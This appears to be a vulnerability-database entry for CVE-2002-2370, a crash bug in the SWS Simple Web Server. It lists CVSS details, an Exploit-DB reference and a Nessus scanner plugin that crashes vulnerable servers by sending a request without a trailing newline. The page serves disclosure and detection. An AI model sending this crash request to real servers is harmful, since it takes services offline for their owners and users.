Vulnerabilities > CVE-2002-2370 - Denial Of Service vulnerability in SWS Simple web Server 0.0.3/0.0.4/0.1.0

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
sws
nessus
exploit available

Summary

SWS web server 0.0.4, 0.0.3 and 0.1.0 allows remote attackers to cause a denial of service (crash) via a URL request that does not end with a newline.

Vulnerable Configurations

Part Description Count
Application
Sws
3

Exploit-Db

descriptionSWS Simple Web Server 0.0.3/0.0.4/0.1 New Line Denial Of Service Vulnerability. CVE-2002-2370. Dos exploit for linux platform
idEDB-ID:21775
last seen2016-02-02
modified2002-09-02
published2002-09-02
reportersaman
sourcehttps://www.exploit-db.com/download/21775/
titleSWS Simple Web Server 0.0.3/0.0.4/0.1 New Line Denial of Service Vulnerability

Nessus

NASL familyWeb Servers
NASL idSWS_DOS.NASL
descriptionThe SWS web server running on this port crashes when it receives a request that doesn
last seen2020-06-01
modified2020-06-02
plugin id11171
published2002-11-27
reporterThis script is Copyright (C) 2002-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/11171
titleSWS Web Server Unfinished Line Remote DoS
code
#
# (C) Tenable Network Security, Inc.
#

# Modifications by rd:
#	- Removed the numerous (and slow) calls to send() and recv()
#	  because the original exploit states that sending just one
#	  request will crash the server
#
########################
# References:
########################
#
# Message-Id: <[email protected]>
# Date: Mon, 2 Sep 2002 11:02:31 -0700
# To: [email protected]
# From: [email protected]
# Subject: [VulnWatch] SWS Web Server v0.1.0 Exploit
#
########################
#
# Vulnerable:
# SWS Web Server v0.1.0
#

include("compat.inc");

if(description)
{
 script_id(11171);
 script_version("1.24");

 script_cve_id("CVE-2002-2370");
 script_bugtraq_id(5664);
 
 script_name(english:"SWS Web Server Unfinished Line Remote DoS");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server is prone to a denial of service attack." );
 script_set_attribute(attribute:"description", value:
"The SWS web server running on this port crashes when it receives a
request that doesn't end in a newline. 

An unauthenticated, remote attacker can exploit this vulnerability to
disable the service." );
 # https://web.archive.org/web/20111004151520/http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0100.html
 script_set_attribute(
  attribute:"see_also", 
  value:"http://www.nessus.org/u?38653668"
 );
 script_set_attribute(attribute:"solution", value: "Unknown at this time." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(
  attribute:"vuln_publication_date", 
  value:"2002/09/02"
 );
 script_set_attribute(
  attribute:"plugin_publication_date", 
  value:"2002/11/27"
 );
 script_cvs_date("Date: 2018/06/27 18:42:26");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();
 
 script_summary(english:"SWS web server crashes when unfinished line is sent");
 script_category(ACT_DENIAL);

 script_copyright(english:"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");
 script_family(english:"Web Servers");
 script_dependencie("http_version.nasl");
 script_require_ports("Services/www",80);
 exit(0);
}

#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);

if(http_is_dead(port:port))exit(0);

r = http_send_recv_buf(port: port, data:"|Nessus|");
if(http_is_dead(port:port, retry:3)) security_warning(port);